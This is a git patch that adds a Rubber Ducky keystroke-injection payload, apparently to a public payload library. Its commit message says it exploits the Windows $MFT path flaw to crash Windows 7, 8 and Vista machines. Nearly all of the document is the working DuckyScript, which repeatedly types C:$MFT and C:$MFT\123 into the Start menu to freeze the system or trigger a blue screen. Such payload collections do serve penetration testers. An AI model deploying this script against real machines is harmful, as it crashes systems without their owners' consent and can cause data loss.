From 31bdc108fe64b8b03ee57bcafa42a92d6ee7ed49 Mon Sep 17 00:00:00 2001
From: Jonny Banana <azazaelisback@gmail.com>
Date: Thu, 15 Jul 2021 02:46:12 +0200
Subject: [PATCH] Create payload.txt

A Simple Script for Rubber Ducky which Exploits Windows $MFT Vulnerability.
$MFT is used by NTFS systems to manage some metadata. Works on windows 7, 8 and vista, dont work on windows 10. I think work on Xp and earlier. The system crash lasts until the machine is switched off, or until the blue screen of death appears
---
 .../execution/$MFT-Duck-Crasher/payload.txt   | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 payloads/library/execution/$MFT-Duck-Crasher/payload.txt

diff --git a/payloads/library/execution/$MFT-Duck-Crasher/payload.txt b/payloads/library/execution/$MFT-Duck-Crasher/payload.txt
new file mode 100644
index 0000000..dc384ea
--- /dev/null
+++ b/payloads/library/execution/$MFT-Duck-Crasher/payload.txt
@@ -0,0 +1,35 @@
+REM works on w7 - w8 - Vista (and i think xp and earlier too)
+REM it uses a high delay to support even older computers
+DELAY 1000
+CONTROL ESCAPE
+DELAY 500
+STRING C:$MFT
+DELAY 500
+ENTER
+DELAY 700
+REM the 2nd enter is to close the error
+ENTER
+DELAY 500
+CONTROL ESCAPE
+DELAY 500
+STRING C:$MFT\123
+DELAY 500
+ENTER
+DELAY 700
+ENTER
+DELAY 500
+CONTROL ESCAPE
+DELAY 500
+STRING C:$MFT
+DELAY 500
+ENTER
+DELAY 700
+ENTER
+DELAY 500
+CONTROL ESCAPE
+DELAY 500
+STRING C:$MFT\123
+DELAY 500
+ENTER
+DELAY 700
+ENTER